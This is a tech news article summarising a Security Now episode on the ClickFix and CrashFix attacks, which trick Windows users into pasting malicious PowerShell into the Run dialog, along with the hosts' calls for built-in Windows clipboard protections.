Tech

How the Latest "ClickFix" Exploit Targets Windows Users

Mar 4th 2026

AI-generated, human-reviewed.

A new exploit called "ClickFix," further weaponized by a threat actor dubbed Kong Tuk, is actively targeting Windows users by tricking them into running malicious commands. According to Security Now hosts Steve Gibson and Leo Laporte, this attack leverages fake browser crash dialogs and social engineering to bypass traditional protections—and Microsoft urgently needs to address this vulnerability.

What is the ClickFix Exploit?

The ClickFix exploit is a rapidly evolving malware strategy that manipulates Windows users into pasting harmful commands from their clipboard directly into the Windows Run dialog. This is usually done through a web browser pop-up, disguised as a security or troubleshooting prompt, asking users to prove they are human or fix their browser.

Kong Tuk, a threat actor tracked by Huntress Labs, has taken this attack further with a new variant called "CrashFix." In this iteration, victims see a convincing Microsoft Edge crash dialog. They're told to run a scan—by pressing Win+R, pasting from the clipboard, and hitting Enter. What’s actually pasted is a malicious PowerShell command, effectively giving attackers complete access to the machine.

Unlike typical phishing, this attack doesn’t rely on downloading files or clicking suspicious links. It uses the browser’s clipboard and Windows built-in features against the user.

Why Is This Exploit So Dangerous?

  • Highly convincing prompts: The pop-ups mimic legitimate Microsoft dialogs so well that even savvy users may be fooled.
  • Minimal defense from antivirus solutions: Since the attack leverages user actions and legitimate Windows functionality, traditional antivirus software often doesn’t detect or block it.
  • No technical knowledge required for the victim: Users simply follow instructions, making it dangerous for anyone, regardless of experience level.

On Security Now, Steve Gibson highlighted that the underlying issue is the power and complexity of Windows, combined with users’ tendency to follow instructions without understanding the risks. Attackers are now able to bypass most technical defenses by exploiting human behavior.

What Should Microsoft and Users Do?

According to Steve Gibson, the only practical fix is for Microsoft to build protections directly into Windows. He recommends:

  • Clipboard quarantine measures: Windows should flag clipboard content sourced from web browsers and alert users before allowing it to be executed.
  • Enhanced user prompts: Mark risky operations (like running PowerShell commands pasted from the clipboard) with clear warnings, similar to how downloaded files are flagged with the Mark of the Web.
  • User education: While technical fixes are critical, ongoing education about social engineering tactics is essential.

Third-party utilities to address this would have limited impact, since the users most at risk rarely know or install them. Only operating systems, like Windows, can meaningfully protect everyone.

Key Takeaways

  • ClickFix and CrashFix exploit Windows user behavior, not software flaws
  • Threat actor Kong Tuk uses cloned browser extensions and fake dialogs to trick users
  • Malicious PowerShell commands are delivered through clipboard instructions
  • Antivirus software often fails to detect these attacks
  • Microsoft needs to implement clipboard and command execution safeguards
  • Users should be skeptical of browser dialogs that ask them to run commands or paste contents into the Run dialog
  • Education and built-in OS protections are the only scalable solutions

The Bottom Line

Security Now episode 1067 makes clear: As social engineering attacks become more sophisticated, relying on traditional antivirus and careful browsing is no longer enough. Windows users are especially vulnerable to attacks like ClickFix and Kong Tuk’s CrashFix. Staying safe requires skepticism toward unexpected prompts—especially those that instruct you to paste or run commands. But most importantly, operating system vendors must proactively build protections to stop these exploits before they spread further.

Subscribe for More Security Insights

Want in-depth analysis on the latest cybersecurity threats? Subscribe to Security Now for expert commentary and actionable advice.
https://twit.tv/shows/security-now/episodes/1067

Click, Paste, Pwned Security Now #1067
Mar 3 2026 - KongTuke's CrashFix
Click, Paste, Pwned
All Tech posts